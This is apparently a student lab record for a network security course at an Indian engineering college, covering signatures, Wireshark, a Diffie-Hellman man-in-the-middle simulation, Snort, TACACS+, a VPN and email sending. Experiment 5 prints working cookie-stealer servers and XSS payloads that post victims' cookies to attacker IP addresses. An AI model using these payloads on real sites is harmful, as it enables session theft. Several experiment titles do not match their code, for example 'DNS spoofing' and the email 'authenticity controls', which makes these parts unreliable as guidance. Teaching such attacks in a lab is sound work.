ANNA UNIVERSITY, CHENNAI

KARPAGA VINAYAGA COLLEGE OF ENGINEERING AND TECHNOLOGY

(Approved by AICTE, Affiliated to Anna University)
GST Road, Karpaga Vinayaga Nagar,
Palayanoor Post, Madhuranthagam Taluk,
Chengalpattu Dist-603308.

LABORATORY RECORD

DEPARTMENT OF COMPUTER SCIENCE

AND ENGINEERING (WITH
SPECIALIZATION IN NETWORKS)

NE4261 – NETWORK SECURITY LABORATORY

REG.NO :

NAME :

YEAR : CSE I YEAR

SEMESTER : II
 Karpaga Vinayaga
College of Engineering and Technology
DEPARTMENT OF COMPUTER SCIENCE AND
ENGINEEERING (WITH SPECIALIZATION IN
NETWORKS)

Name : .......................................................................................................................

Reg. No :

Subject Code : NE4261

Subject : NETWORK SECURITY LABORATORY

Course : MASTER OF COMPUTER SCIENCE AND ENGINEERING (WITH

SPECIALIZATION IN NETWORKS)

Certified that this is the bonafide record of practicals done as a part of semester
during the academic year 20 _- 20___ .

Staff In-charge Head of the Department

Submitted for University Practical Examination held on

Internal Examiner External Examiner

 INDEX

SNO DATE NAME OF THE EXPERIMENT PAGE SIGN

NO

1. Implement the SIGNATURE SCHEME 1

- Digital Signature Standard

2. Implement how to capture and analyze packets 7

using Wireshark
To Analysis Network using Wireshark for
3. (a) (a)Traffic Monitoring (TCP slow down and 9
HTTP slow down)

3.(b) To Analysis Network using Wireshark for 13

Packet Sniffing

4. To perform man in middle attack using DNS 18

spoofing

5. To Perform HTTP Session Hijacking 21

through Cookie stealing

6. To Configure AAA (TACACS+) on Packet 28

Tracer for User Authentication

7 Demonstrate intrusion detection system (ids) 30

using any tool(snort or any other software)

8. Create a Virtual Private Network and evaluate 33

application response time in the presence and
absence of a firewall.
Implementation of Email incoming and
9. outgoing authenticity controls and malware 36
filtration and attachment security

3
EX.NO : 1

Implement the SIGNATURE SCHEME - Digital Signature Standard

DATE :

AIM :

Implement the SIGNATURE SCHEME - Digital Signature Standard

ALGORITHM :

1. Choose two large prime numbers p and q

2. Calculate n=p*q
3. Select public key e such that it is not a factor of (p-1)*(q-1)
4. Select private key d such that the following equation is true (d*e)mod(p-1)(q-1)=1 or d is inverse of E
in modulo (p-1)*(q-1)
PROGRAM :

# Function to find gcd

# of two numbers
def euclid(m, n):
if n == 0:
return m
else:
r=m%n
return euclid(n, r)
# Program to find
# Multiplicative inverse
def exteuclid(a, b):
r1 = a
r2 = b
s1 = int(1)
s2 = int(0)
t1 = int(0)
t2 = int(1)
while r2 > 0:
q = r1//r2
r = r1-q * r2
r1 = r2
r2 = r
s = s1-q * s2
s1 = s2
s2 = s

4
t = t1-q * t2
t1 = t2
t2 = t

if t1 < 0:
t1 = t1 % a
return (r1, t1)
# Enter two large prime
# numbers p and q
p = 823
q = 953
n=p*q
Pn = (p-1)*(q-1)
# Generate encryption key
# in range 1<e<Pn
key = []
for i in range(2, Pn):
gcd = euclid(Pn, i)
if gcd == 1:
key.append(i)
# Select an encryption key
# from the above list
e = int(313)
# Obtain inverse of
# encryption key in Z_Pn
r, d = exteuclid(Pn, e)
if r == 1:
d = int(d)
print("decryption key is: ", d)
else:
print("Multiplicative inverse for\
the given encryption key does not \
exist. Choose a different encryption key ")
# Enter the message to be sent
M = 19070
# Signature is created by Alice
S = (M**d) % n
# Alice sends M and S both to Bob
# Bob generates message M1 using the
# signature S, Alice's public key e
# and product n.
M1 = (S**e) % n

5
 # If M = M1 only then Bob accepts
# the message sent by Alice.
if M == M1:
print("As M = M1, Accept the\
message sent by Alice")
else:
print("As M not equal to M1,\
Do not accept the message\
sent by Alice ")

OUTPUT :

decryption key is: 160009

As M = M1, Accept the message sent by Alice

RESULT :
To Successfully verify SIGNATURE SCHEME - Digital Signature Standard in Python Program

6
EX.NO : 2
Implement how to capture and analyze packets using Wireshark
DATE :

AIM :

To Implement how to capture and analyze packets using Wireshark

ALGORITHM :

1. To Installing wireshark for Linux platform is super easy

2. Upon firing up Wireshark first you need to choose the interface for which you want to capture
the traffic for wireless, ethernet etc.
3. To filter traffic from any specific IP address type: ip.addr == 'xxx.xx.xx.xx' in the Apply a
display filter field.

4. To filter traffic for specific protocol say TCP, UDP, SMTP, ARP, DNS Requests etc just type the
protocol name in the Apply a display filter field.

5. Stop the packet capture by clicking on the Stop button.

6. Go to, File → Save as → Filename.pcap

PROGRAM :

#!usr/bin/env python

# this code prints Source and Destination IP from the given 'pcap' file

import dpkt

import socket

def printPcap(pcap):

for (ts,buf) in pcap:

try:

eth = dpkt.ethernet.Ethernet(buf)

ip = eth.data

# read the source IP in src

src = socket.inet_ntoa(ip.src)

7
 # read the destination IP in dst

dst = socket.inet_ntoa(ip.dst)

# Print the source and destination IP

print 'Source: ' +src+ ' Destination: ' +dst

except:

pass

def main():

# Open pcap file for reading

f = open('/home/codeplay/Desktop/first.pcap')

#pass the file argument to the pcap.Reader function

pcap = dpkt.pcap.Reader(f)

printPcap(pcap)

if __name__ == '__main__':

main()

OUTPUT :

RESULT :

To successfully verify capture and analyze packets using Wireshark

8
EX.NO : 3 To Analysis Network using Wireshark for
(a)Traffic Monitoring (TCP slow down and HTTP slow down)
Date :

AIM :
To Analysis Network using Wireshark for Traffic Monitoring (TCP slow down and HTTP slow down)

ALGORITHM :
1. We are going to use a few Python libraries:
 Pandas as pd → read data and store in a dataframe
 MatPlotlib as plt → graph data
 Networkx as nx → graph data as nodes if they communicated

2. load your data based on its file path. Looking at our data frame, we see the columns →‘No.’,
‘Time’, ‘Source’, ‘Destination’, ‘Protocol’, ‘Length’, ‘Info’

9
 3. Taking a look at “sources” reveals which devices had the least/most number of communications.

4. You can note the same information from “destinations”.

10
5. If you investigate “protocols”, you’ll see a few HTTP types of communications. As a security
professional, you know that means information communicated is not encrypted. Meaning, anyone can
read it, so hopefully, there was nothing confidential!

PROGRAM :

11
OUTPUT :

RESULT:
Observing our results we see which devices it communicated with and other devices it could have potentially reached.

12
EX.NO : 3 To Analysis Network using Wireshark for
(b) Packet SniffingDate :

AIM :
To Analysis Network using Wireshark for Packet Sniffing

ALGORITHM :

1. Start up the Wireshark program (select an interface and press start to capture packets).
2. Start up your favorite browser (ceweasel in Kali Linux).
3. In your browser, go to Wayne State homepage by typing www.wayne.edu.
4. After your browser has displayed the http://www.wayne.edu page, stop Wireshark packet capture
by selecting stop in the Wireshark capture window. This will causethe Wireshark capture window
to disappear and the main Wireshark window to display all packets captured since you began
packet capture see image below:

5. Color Coding: You’ll probably see packets highlighted in green, blue, and black. Wireshark uses
colors to help you identify the types of traffic at a glance. By default, green is TCP traffic, dark
blue is DNS traffic, light blue is UDP traffic, and black identifies TCP packets with problems —
for example, they could have beendelivered out-of-order.

6. You now have live packet data that contains all protocol messages exchanged between your
computer and other network entities! However, as you will notice the HTTP messages are not
clearly shown because there are many other packets included in the packet capture. Even though
the only action you took was to open your browser, there are many other programs in your
computer that communicate via the network in the background. To filter the connections to the
ones we want to focus on, we have to use the filtering functionality of Wireshark by typing “http”
in the filtering field as shown below:

13
7. To further filter packets in Wireshark, we need to use a more precise filter. By setting the
http.host==sustech, we are restricting the view to packets that have as an http host the
www.wayne.edu website. Notice that we need two equal signs toperform the match “==” not just
one. See the screenshot below:

14
8. Now, we can try another protocol. Let’s use Domain Name System (DNS) protocolas an example
here.

15
9. Let’s try now to find out what are those packets contain by following one of the conversations
(also called network flows), select one of the packets and press theright mouse button (if you are
on a Mac use the command button and click), you should see something similar to the screen
below:

Click on Follow UDP Stream, and then you will see following screen.

16
 10. If we close this window and change the filter back to “http.host==www.wayne.edu”and then follow
a packet from the list of packets that match that filter, we should get the something similar to the
following screens. Note that we click on Follow TCP Stream this time.

RESULT :
To Successfully Analysis Network using Wireshark for Packet Sniffing
17
EX.NO : 4
To perform man in middle attack using DNS spoofing
DATE :

AIM :

To perform man in middle attack using DNS spoofing

ALGORITHM :

Step 1: Selected public numbers p and g, p is a prime number, called the “modulus” and g is called
the base.

Step 2: Selecting private numbers.

let Alice pick a private random number a and let Bob pick a private random number b, Malory picks 2
random numbers c and d.

Step 3: Intercepting public values,

Malory intercepts Alice’s public value (ga(mod p)), block it from reaching Bob, and instead sends Bob her
own public value (gc(modp)) and Malory intercepts Bob’s public value (g b(mod p)), block it from reaching
Alice, and instead sends Alice her own public value (g d (modp))

Step 4: Computing secret key

Alice will compute a key S 1=gda(mod p), and Bob will compute a different key, S 2=gcb(mod p)

Step 5: If Alice uses S 1 as a key to encrypt a later message to Bob, Malory can decrypt it, re-encrypt it
using S 2, and send it to Bob. Bob and Alice won

PROGRAM :

import random
# public keys are taken
# p is a prime number
# g is a primitive root of p
p = int(input('Enter a prime number : '))
g = int(input('Enter a number : '))

class A:
def __init__(self):
# Generating a random private number selected by alice
self.n = random.randint(1, p)

def publish(self):
18
 # generating public values
return (g**self.n)%p

def compute_secret(self, gb):

# computing secret key
return (gb**self.n)%p

class B:
def __init__(self):
# Generating a random private number selected for alice
self.a = random.randint(1, p)
# Generating a random private number selected for bob
self.b = random.randint(1, p)
self.arr = [self.a,self.b]

def publish(self, i):

# generating public values
return (g**self.arr[i])%p

def compute_secret(self, ga, i):

# computing secret key
return (ga**self.arr[i])%p

alice = A()
bob = A()
eve = B()

# Printing out the private selected number by Alice and Bob

print(f'Alice selected (a) : {alice.n}')
print(f'Bob selected (b) : {bob.n}')
print(f'Eve selected private number for Alice (c) : {eve.a}')
print(f'Eve selected private number for Bob (d) : {eve.b}')

# Generating public values

ga = alice.publish()
gb = bob.publish()
gea = eve.publish(0)
geb = eve.publish(1)
print(f'Alice published (ga): {ga}')
print(f'Bob published (gb): {gb}')
print(f'Eve published value for Alice (gc): {gea}')
print(f'Eve published value for Bob (gd): {geb}')
19
 # Computing the secret key
sa = alice.compute_secret(gea)
sea = eve.compute_secret(ga,0)
sb = bob.compute_secret(geb)

seb = eve.compute_secret(gb,1)
print(f'Alice computed (S1) : {sa}')
print(f'Eve computed key for Alice (S1) : {sea}')
print(f'Bob computed (S2) : {sb}')
print(f'Eve computed key for Bob (S2) : {seb}')

OUTPUT :

Enter a prime number (p) : 227

Enter a number (g) : 14
Alice selected (a) : 227
Bob selected (b) : 170
Eve selected private number for Alice (c) : 65
Eve selected private number for Bob (d) : 175
Alice published (ga): 14 Bob published (gb): 101
Eve published value for Alice (gc): 41
Eve published value for Bob (gd): 32
Alice computed (S1) : 41
Eve computed key for Alice (S1) : 41
Bob computed (S2) : 167
Eve computed key for Bob (S2) : 167

Result :
To Successfully Verify perform man in middle attack using DNS spoofing
20
EX.NO : 5
To Perform HTTP Session Hijacking through Cookie stealing
DATE :

AIM :

To Perform HTTP Session Hijacking through Cookie stealing

PROCEDURE :
 Many popular websites have been affected by cookie hijacking. For instance, Flickr has been hit by a
script that steals users’ passwords and sends them to an attacker’s email address.
 This type of attack occurs when the attacker embeds malicious JavaScript code into an otherwise
authentic-looking email or advertisement.
 This malicious code is then executed by the victim’s browser when they visit the infected site; it will
display an endless series of popups that may be used for phishing purposes to steal your login
credentials or other sensitive information.
 In addition, some sites have also been modified so that they harvest cookie data from unsuspecting
visitors without requiring them to provide their login credentials first.

PROGRAM :
layout: post
title: XSS Session Hijacking Part I
categories:
- web hacking
- python--
# Prerequisites
Before we get started, let's get our development environment set up. We start by creating a new
project directory.
{% highlight bash %}
# create new project directory
mkdir cookiestealer
{% endhighlight %}
{% highlight bash %}
# initialize virtual environment
cd cookiestealer

21
virtualenv --no-site-packages env
{% endhighlight %}
{% highlight bash %}
. env/bin/activate
{% endhighlight %}
{% highlight bash %}
echo "flask\nflask-cors" > pip.req
{% endhighlight %}

{% highlight bash %}

pip install -r pip.req

{% endhighlight %}

{% highlight bash %}

touch no-redirect.py

{% endhighlight %}

{% endhighlight %}

{% highlight python %}

# instantiate new Flask object

app = Flask(__name__)

# turn on debug output

app.debug = True

{% endhighlight %}

{% highlight python %}

# disable Flask's same origin policy

CORS(app)

{% endhighlight %}

{% highlight python %}

@app.route('/')
22
def index():
cookies = request.args.get('cookies')
with open('cookies.txt', 'a') as fd:
print cookies
fd.write(cookies)

return render_template('index.html', cookies=cookies)

{% endhighlight %}

{% highlight python %}

# run cookie stealer server

app.run(host='0.0.0.0', port=80)

{% endhighlight %}

{% highlight python %}
from flask import Flask, request, render_template
from flask.ext.cors import CORS

app = Flask(__name__)
app.debug = True

CORS(app)

@app.route('/')
def index():

cookies = request.args.get('cookies')
with open('cookies.txt', 'a') as fd:
print cookies
fd.write(cookies)
return render_template('index.html', cookies=cookies)

# run cookie stealer server

app.run(host='0.0.0.0', port=80)

{% endhighlight %}

The complete cookie stealing server is shown above.

# How to use a cookie stealer

<iframe width="560" height="315" src="https://www.youtube.com/embed/E512FG_Hv98"

23
frameborder="0" allowfullscreen></iframe>

# Improving our Cookie Stealer with Redirection

{% highlight python %}

from flask import Flask, request

from flask.ext.cors import CORS
from flask import redirect

app = Flask(__name__)
app.debug = True

CORS(app)

@app.route('/')
def index():

cookies = request.args.get('cookies')
with open('cookies.txt', 'a') as fd:
fd.write(cookies)
return redirect( request.referrer )

app.run(host='0.0.0.0', port=80)

{% endhighlight %}

Notice that we've added another import statement at the top of the file:

{% highlight python %}

from flask import redirect

{% endhighlight %}

{% highlight python %}

return redirect( request.referrer )

{% endhighlight %}

<iframe width="560" height="315" src="https://www.youtube.com/embed/L4FEw5tDpEE"

frameborder="0" allowfullscreen></iframe>

24


{% highlight html %}

mtxMessage=<script>if (document.cookie.indexOf("hasbeenpwnd") == -1){ document.cookie

= "hasbeenpwnd=hasbeenpwnd"; document.location =
"http://172.16.156.132?cookies="+document.cookie;
};</script>&txtName=test&btnSign=Sign+Guestbook

{% endhighlight %}
<iframe width="560" height="315" src="https://www.youtube.com/embed/PtqRHgQAgUU"
frameborder="0" allowfullscreen></iframe>

# AJAX - The Session Hijacker's Holy Grail

>
> -- <cite>[Mozilla Developer Network](https://developer.mozilla.org/en-
US/docs/AJAX/Getting_Started)</cite>

## Building an AJAX cookie stealer

{% highlight javascript %}

var xmlhttp = new XMLHttpRequest();

xmlhttp.open("POST", "http://192.168.1.191/update", true);
xmlhttp.send(JSON.stringify({hostname: window.location.host, session:document.cookie}));

{% endhighlight %}

The code shown above simply creates a new XMLHttpRequest objects, initializes a POST
request object, and uses the request object to send the user's cookies to the attacker's server.
The script's injectable form is shown below.

{% highlight html %}
<script> var xmlhttp = new XMLHttpRequest(); xmlhttp.open("POST",
"http://192.168.1.191/update", true); xmlhttp.send(JSON.stringify({hostname:
window.location.host, session:document.cookie})); </script>
{% endhighlight %}

{% highlight python %}

from flask import Flask, request

from flask.ext.cors import CORS

25
app = Flask(__name__)
app.debug = True

CORS(app)

@app.route('/', methods = [ 'POST' ])

def index():

cookies = request.json.get('cookies', None)

if cookies is not None and cookies not in stolen_cookies:

stolen_cookies.add(cookies)

with open('cookies.txt', 'a') as fd:

fd.write(cookies)

print cookies

return {
'Success' : True,
}

app.run(host='0.0.0.0', port=80)

{% endhighlight %}

In addition, the script keeps a set of stolen cookies to keep duplicates to a minimum. You can
see the AJAX cookie stealer in action in the video below.

<iframe width="560" height="315" src="https://www.youtube.com/embed/mmiYFBxIDN0"

frameborder="0" allowfullscreen></iframe>

26
OUTPUT :

RESULT :
To Successfully Verify http session hijacking through cookie stealing

27
EX.NO : 6 To Configure AAA (TACACS+) on Packet Tracer for User Authentication

DATE :

AIM :
To Impliment Configure AAA (TACACS+) on Packet Tracer for User Authentication

ALGORITHM :
1. Enabling AAA.
2. Setting Username / Password.
3. Setting Authetication Method.
4. Assigning TACACS Server.
5. Telnet Configuration.
6. TACACS+ Authorisation Configuration.
7. TACACS+ Accounting Configuration.
PROGRAM :
Switch(config)# aaa new-model

Switch(config)# username cisco password cisco

Switch(config)# enable password mycisco

Switch(config)# aaa authentication login myauth group tacacs+ local

Note: when TACACS server becomes unreachable, you use switch’s local database for
authentication.

Switch(config)# tacacs-server host 10.1.1.10 key mykey

Switch(config)# interface Vlan1

Switch(config-if)# ip address 10.1.1.20 255.0.0.0

Switch(config-if)# exit

Switch(config)# line vty 0 4

Switch(config-line )# login authentication myauth

28
OUTPUT:

RESULT :
To Successfully verify the AAA (TACACS+) on Packet Tracer for User Authentication configuration.
29
EX.NO : 7 Demonstrate intrusion detection system (ids) using any tool
(snort or any other software)
DATE :

AIM :
To Demonstrate intrusion detection system (ids) using any tool(snort or any other software)

ALGORITHM:
Installation Steps:
In Linux:
 Step-1: wget https://www.snort.org/downloads/snort/snort-2.9.15.tar.gz
 Step-2: tar xvzf snort-2.9.15.tar.gz
 Step-3: cd snort-2.9.15
 Step-4: ./configure –enable-sourcefire && make && sudo make install
In Windows:
 Step-1: Download SNORT installer from
https://www.snort.org/downloads/snort/Snort_2_9_15_Installer.exe
 Step-1: Execute the Snort_2_9_15_Installer.exe

PROGRAM:
To run Snort in packet dump mode, use the following command:

kali > sudo snort -vde

The output we get is pretty self-explanatory . For using Snort as a NIDS, we need to instruct Snort
to include the configuration file and rules. Generally, we can find the conf file
at /etc/snort/snort.conf and that file will point to Snort rules. We need to give the -c switch and
then the location.

kali > sudo snort -vde -c /etc/snort/snort.conf

We can also customise the rules to suit our needs.

30
Snort — rules and configuration

Like all general Linux applications, Snort is configured via a conf file, which can be opened as a
simple text file. Edit this text file, restart the application and we have a new working configuration.

Before going any further, let’s take a brief look into the syntax of Snort rules.

 Snort rules must be contained in a single line or we can use the multi-line character \. For
example:
log tcp !x.x.x/xx OR

log tcp !x.x.x/xx any -> xxx \

(msg: “some command”)

 All rules should contain a rule header (which identifies the actions) and rule options (which
identify the rule’s alert messages).
 The rules must describe situations like a violation of the security policy of the company, or
correctly detect the exploitable vulnerabilities.
There are three kinds of rules in Snort:

1. Alert rules: This generates alerts using the alert method.

2. Log rules: Upon generation of any alert, it logs that specific alert.
3. Pass rules: Ignores the packet if deemed malicious and drops it.
Now we can move on to the configuration file, which can be opened using the following command:

kali > mousepad /etc/snort/snort.conf

31
Disable rules

Depending on your enterprise, we may need to change the rules that Snort relies upon, and customise them
in Section

To not let Snort use a given set, simply comment out the include part.

After making any change, simply save the file and test the configuration using the -
T switch.

kali > sudo snort -T -c /etc/snort/snort.conf

OUTPUT:

RESULT:
To Successfully Verify Demonstrate intrusion detection system (ids) using tool snort
32
 EX.NO : 8 Create a Virtual Private Network and evaluate application response time in the
presence and absence of a firewall.

DATE :

AIM :
To Create a Virtual Private Network and evaluate application response time in the presence and
absence of a firewall.

ALGORITHM:
1. Step 1: Line up key VPN components. ...
2. Step 2: Prep devices. ...
3. Step 3: Download and install VPN clients. ...
4. Step 4: Find a setup tutorial. ...
5. Step 5: Log in to the VPN. ...
6. Step 6: Choose VPN protocols. ...
7. Step 7: Troubleshoot. ...
8. Step 8: Fine-tune the connection.

PROGRAM:

Step 1: Line up key VPN components

To get started, you'll need a VPN client, a VPN server, and a VPN router. The downloadable client
connects you to servers around the world, so employees everywhere can access your small business network.
The client can be used on devices like smartphones and laptops, even if workers are using public Wi-Fi
networks.

To secure and encrypt all network traffic, you'll also need a VPN router. Many routers come with VPN
clients built-in.

Step 2: Prep devices

On occasion, VPN clients can conflict with other clients, or fail to work properly. It's a good
idea to prepare your network system before you set up a VPN so that you can avoid problems down
the road.
As a first step, uninstall any existing VPN client software that you don’t need. In theory, the
VPN clients should be able to work well together, but competing clients can also be a source of
problems, so it’s best to remove them.

Step 3: Download and install VPN clients

The simplest way to get your VPN up and running is to install clients from your VPN provider.
However, they may not offer software for every platform you need, such as Windows, iOS, and
Android. Even if they don't, it's better to install what they offer first and then confirm that your VPN
account is operating correctly.

33
 Look for the "downloads" page on your VPN provider's website. You should also download
apps for the mobile devices that your workers use since you’ll want to protect connections from as
many devices as possible.

Step 4: Find a setup tutorial

If, for some reason, your VPN provider doesn't offer software for the devices your business uses, check
the provider's website for guides on manual setup. Hopefully, you'll find the documentation you need. If you
don't, search for other providers' setup guides that use the same devices.

Step 5: Log in to the VPN

After you install the VPN client apps, it's time to enter login information. In general, the username and
password will be the ones you used when you signed up with the VPN provider, although some companies ask
you to create a separate login for the VPN client itself.

Once you're logged in, the VPN app usually connects to the server nearest to your current location.

Step 6: Choose VPN protocols

VPN protocols decide how data is routed between your computer and the VPN server. Some protocols
help improve speed, while others help improve data privacy and security.

OpenVPN

1. L2TP/IPSec

2. SSTP

3. PPTP

Step 7: Troubleshoot
Usually, your VPN provider's client will start working right away. But if that's not the case, try these steps:

 Shut down and reopen the client and try rebooting your device.

 If you have any other VPN software running, make sure you're disconnected, then close it down.
VPN clients need appropriate software drivers to work correctly. In some cases, you can click on the "repair"
setting to reload drivers. Check the settings page to see if this feature is available.

Step 8: Fine-tune the connection

Once you have the basics out of the way, it's time for improvements. Make sure the settings you've
applied to the VPN suit your business's needs.

For example, decide whether you'd like the VPN to run as soon as people start their devices. This may
be a good idea if you need the protection of a VPN all the time—for example, if most people work outside the
office. But if you think that you'll only need to use the VPN occasionally, you can set it to launch only when
required, freeing up network resources for other uses.

Another fine-tuning option is to choose commonly used servers as your defaults or "favorites." This can
save you a bit of time since you and other employees won't have to search for preferred servers every time you
connect.

34
 You may also want to turn on the "kill-switch" if your VPN provider offers it. The kill-switch is
designed to prevent a device from sending or receiving data if the VPN becomes disconnected.

OUTPUT:

RESULT:
To Successfully verify Virtual Private Network and evaluate application response time in the presence and
absence of a firewall
35
EX.NO : 9
Implementation of Email incoming and outgoing authenticity controls and
malware filtration and attachment security
DATE :

AIM :

Implementation of Email incoming and outgoing authenticity controls and malware filtration and
attachment security

ALGORITHM :
1. Import the following modules MIMEText,MIMEImage, MIMEAudio

2. Let’s set up a connection to our email server .

3. To Assign the MIMEMultipart object to the msg variable after initializing it.

4. The MIMEText function will be used to attach text.

5. Attach the image data to MIMEMultipart using MIMEImage, we add the given
filename use os.basename

6. by using the sendmail function, pass parameters such as from where, to where, and
the message content.

PROGRAM :
# Import the following module
from email.mime.text import MIMEText
from email.mime.image import MIMEImage
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
import smtplib
import os
# initialize connection to our
# email server, we will use gmail here
smtp = smtplib.SMTP('smtp.gmail.com', 587)
smtp.ehlo()
smtp.starttls()

36
# Login with your email and password
smtp.login('Your Email', 'Your Password')

# send our email message 'msg' to our boss

def message(subject="Python Notification",text="", img=None,attachment=None):

# build message contents

msg = MIMEMultipart()

# Add Subject
msg['Subject'] = subject

# Add text contents

msg.attach(MIMEText(text))

# Check if we have anything

# given in the img parameter
if img is not None:

# Check whether we have the lists of images or not!

if type(img) is not list:

# if it isn't a list, make it one

img = [img]

# Now iterate through our list

for one_img in img:

# read the image binary data

img_data = open(one_img, 'rb').read()
# Attach the image data to MIMEMultipart
# using MIMEImage, we add the given filename use os.basename
msg.attach(MIMEImage(img_data,
name=os.path.basename(one_img)))

37
 # We do the same for
# attachments as we did for images
if attachment is not None:
# Check whether we have the
# lists of attachments or not!
if type(attachment) is not list:

# if it isn't a list, make it one

attachment = [attachment]

for one_attachment in attachment:

with open(one_attachment, 'rb') as f:

# Read in the attachment

# using MIMEApplication
file = MIMEApplication(
f.read(),
name=os.path.basename(one_attachment)
)
file['Content-Disposition'] = f'attachment;\
filename="{os.path.basename(one_attachment)}"'

# At last, Add the attachment to our message object

msg.attach(file)
return msg

# Call the message function

msg = message("Good!", "Hi there!",
r"C:\Users\Dell\Downloads\Garbage\Cartoon.jpg",
r"C:\Users\Dell\Desktop\slack.py")
# Make a list of emails, where you wanna send mail
to = ["[email protected]",
"[email protected]", "[email protected]"]
38
 # Provide some data to the sendmail function!
smtp.sendmail(from_addr="[email protected]",
to_addrs=to, msg=msg.as_string())

# Finally, don't forget to close the connection

smtp.quit()

OUTPUT :

RESULT:
To Successfully Verify Implementation of Email incoming and outgoing authenticity controls and
malware filtration and attachment security

39